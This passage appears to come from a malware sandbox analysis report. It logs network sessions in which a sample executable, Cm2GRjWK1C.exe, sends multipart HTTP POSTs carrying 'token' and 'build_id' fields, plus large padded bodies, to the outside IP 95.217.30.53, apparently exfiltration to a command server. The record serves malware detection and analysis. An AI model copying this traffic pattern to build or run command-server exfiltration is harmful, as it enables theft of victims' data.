2025-03-15 07:29:42 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-03-15 07:29:42 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-03-15 07:29:42 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-03-15 07:29:42 UTC	6186	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-03-15 07:29:43 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 15 Mar 2025 07:29:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	49770	95.217.30.53	443	7628	C:\Users\user\Desktop\Cm2GRjWK1C.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-15 07:29:43 UTC	182	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----ppp8q1ny58q1va16xln7 Host: 95.217.30.53 Content-Length: 393697 Connection: Keep-Alive Cache-Control: no-cache
2025-03-15 07:29:43 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 70 70 70 38 71 31 6e 79 35 38 71 31 76 61 31 36 78 6c 6e 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 30 37 66 64 31 31 37 63 65 35 64 61 37 37 30 30 61 66 64 66 63 37 62 30 39 32 66 37 31 34 30 0d 0a 2d 2d 2d 2d 2d 2d 70 70 70 38 71 31 6e 79 35 38 71 31 76 61 31 36 78 6c 6e 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 35 34 32 35 62 66 39 31 38 31 65 36 63 31 33 32 61 61 62 39 66 65 39 64 35 64 62 62 30 61 66 0d 0a 2d 2d 2d 2d 2d 2d 70 70 70 38 71 31 6e 79 35 38 71 31 76 61 31 36 78 6c 6e 37 0d 0a 43 6f 6e 74 Data Ascii: ------ppp8q1ny58q1va16xln7Content-Disposition: form-data; name="token"607fd117ce5da7700afdfc7b092f7140------ppp8q1ny58q1va16xln7Content-Disposition: form-data; name="build_id"95425bf9181e6c132aab9fe9d5dbb0af------ppp8q1ny58q1va16xln7Cont
2025-03-15 07:29:43 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-03-15 07:29:43 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-03-15 07:29:43 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-03-15 07:29:43 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-03-15 07:29:43 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-03-15 07:29:43 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-03-15 07:29:43 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-03-15 07:29:43 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-03-15 07:29:43 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-03-15 07:29:44 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 15 Mar 2025 07:29:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	49771	95.217.30.53	443	7628	C:\Users\user\Desktop\Cm2GRjWK1C.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-15 07:29:44 UTC	182	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----2dba1dbsrqq9zuasriwl Host: 95.217.30.53 Content-Length: 131557 Connection: Keep-Alive Cache-Control: no-cache
2025-03-15 07:29:44 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 32 64 62 61 31 64 62 73 72 71 71 39 7a 75 61 73 72 69 77 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 30 37 66 64 31 31 37 63 65 35 64 61 37 37 30 30 61 66 64 66 63 37 62 30 39 32 66 37 31 34 30 0d 0a 2d 2d 2d 2d 2d 2d 32 64 62 61 31 64 62 73 72 71 71 39 7a 75 61 73 72 69 77 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 35 34 32 35 62 66 39 31 38 31 65 36 63 31 33 32 61 61 62 39 66 65 39 64 35 64 62 62 30 61 66 0d 0a 2d 2d 2d 2d 2d 2d 32 64 62 61 31 64 62 73 72 71 71 39 7a 75 61 73 72 69 77 6c 0d 0a 43 6f 6e 74 Data Ascii: ------2dba1dbsrqq9zuasriwlContent-Disposition: form-data; name="token"607fd117ce5da7700afdfc7b092f7140------2dba1dbsrqq9zuasriwlContent-Disposition: form-data; name="build_id"95425bf9181e6c132aab9fe9d5dbb0af------2dba1dbsrqq9zuasriwlCont
2025-03-15 07:29:44 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-03-15 07:29:44 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-03-15 07:29:44 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: 